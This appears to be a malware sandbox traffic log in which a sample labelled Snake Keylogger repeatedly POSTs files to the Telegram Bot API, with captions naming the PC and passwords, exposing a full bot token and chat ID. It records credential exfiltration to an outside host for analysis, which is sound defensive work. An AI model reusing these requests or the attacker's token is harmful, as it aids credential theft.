                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e1bbeaa3Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e1d3c50cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e1e937afHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e20f5e8aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e227801eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e24632ffHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e25baf50Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e27aa8abHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e299a6d4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e2af1b82Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e2c6f1b5Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e2e6b551Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e304f2cbHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e31a64b4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e3323cacHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e3513bb4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e366b155Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e385affeHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e39d86f0Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e3b2fc82Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e3c3ab75Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e3d92132Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e3f0fa00Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255e8ea1fc9Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eac493ffHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eae12f37Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eaf905e4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eb180345Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eb2d79f5Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eb4c7845Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ec9ca33dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ecbba305Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ecd11949Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ecf01548Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed07eda7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed249e37Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed3c6155Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed5b5f3dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed7a5e75Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ed995e14Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255edb5f876Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eddc1e0bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255edf3f502Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee0bccbdHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee391976Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee4ea61cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee6d8d55Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ee8c8b87Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eea46375Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eec0fef0Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255eee725a5Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef16d25fHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef526da2Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef716bedHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef89435dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255ef9eb898Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255efc4de56Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255efdcb580Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255effbb41aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f018515dHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f03027e0Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f06e24edHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f08ac29cHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f0a9c21aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f0cfe7e3Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f0f60d43Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f11c3109Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f1425682Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f1615788Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f180548bHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f195cb65Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f1c577ffHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f1e21602Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255f20113e6Host: api.telegram.orgContent-Length: 407
